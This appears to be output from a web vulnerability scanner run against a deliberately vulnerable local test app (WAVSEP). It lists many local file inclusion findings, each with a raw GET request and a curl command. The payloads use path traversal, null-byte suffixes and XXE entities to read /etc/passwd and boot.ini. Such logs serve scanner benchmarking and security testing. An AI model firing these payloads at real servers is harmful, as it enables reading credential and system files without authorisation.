Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
